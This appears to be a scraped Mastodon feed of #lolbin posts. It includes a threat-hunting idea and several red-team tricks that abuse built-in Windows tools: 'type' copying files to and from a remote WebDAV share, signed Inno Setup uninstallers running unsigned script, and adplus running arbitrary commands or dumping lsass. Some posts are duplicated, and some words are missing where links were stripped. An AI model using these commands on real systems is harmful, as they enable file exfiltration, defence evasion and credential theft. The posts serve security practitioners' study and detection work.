Mr.Trunk · @mrtrunk
5 followers · 8781 posts · Server dromedary.seedoubleyou.me
Mr.Trunk · @mrtrunk
5 followers · 8708 posts · Server dromedary.seedoubleyou.me
Mr.Trunk · @mrtrunk
5 followers · 8609 posts · Server dromedary.seedoubleyou.me

thrunting idea:

’s making queries to domains under 6 months old 🤔

Hypothesis: malware domains are typically younger, fp’s should be fairly easy to identify, and this may shrink the sample size for large orgs

#windows #lolbin #dns #threathunting #thrunting #threatintel #infosec #cyber #cybersecurity #informationsecurity

Last updated 2 years ago

Redbeard · @redbeardsec
17 followers · 80 posts · Server infosec.exchange

What is a ? It's an executable file that can be used to bypass security restrictions and gain unauthorized access to a system. Read more here

redbeardsec.com/exploring-what

#securityawareness #lolbin #cybersecurity #systemsecurity #cyberawareness

Last updated 2 years ago

RT @Mr_0rng
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext

(Bonus ADS 😆)

#lolbin #redteam

Last updated 2 years ago

RT @Mr_0rng
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext

(Bonus ADS 😆)

#lolbin #redteam

Last updated 2 years ago

Rairii :windows: · @Rairii
-1 followers · 650 posts · Server infosec.exchange

Here's an interesting trick I know of:

Inno Setup is a very popular installer on Windows, such that a given system may well have five or more signed Inno Setup uninstallers on it.

The Inno Setup uninstaller will load and execute arbitrary unsigned PascalScript bytecode from a data file in the same directory as it.

In this way, you can use an Inno Setup uninstaller as a and there exists such uninstallers signed by Microsoft (Skype, VSCode).

I recently released a full PascalScript toolchain that can create such a data file: github.com/Wack0/IFPSTools.NET

#redteam #lolbin

Last updated 2 years ago

Tarnkappe.info · @tarnkappeinfo
1529 followers · 3787 posts · Server social.tchncs.de
tXambe · @tXambe
1 followers · 323 posts · Server mastodon.social

RT @nas_bench@twitter.com

We know from LOLBAS that adplus can be used to dump lsass (lolbas-project.github.io/lolba). But you can also use it to run arbitrary commands and binaries with the "-sc" flag.

adplus.exe -crash -o [OutputDir] -sc [Command]

🐦🔗: twitter.com/nas_bench/status/1

#lolbin #lolbas

Last updated 3 years ago